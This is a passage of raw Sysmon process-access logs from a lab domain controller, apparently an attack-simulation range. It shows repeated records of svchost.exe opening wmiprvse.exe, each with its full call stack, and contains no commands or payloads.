13:30:32.045{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012861Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.045{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012860Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.045{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012859Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.045{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012858Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.045{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012857Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.045{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012856Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.045{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012855Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.045{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012854Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.045{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012853Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.045{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012852Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.029{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012851Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.029{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012850Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.029{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012849Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.029{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012848Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.029{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012847Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.029{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012846Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.029{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012845Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.029{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012844Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.029{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012843Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.029{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012842Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.029{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012841Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.029{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012840Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.013{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012839Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.013{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012838Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.013{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012837Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 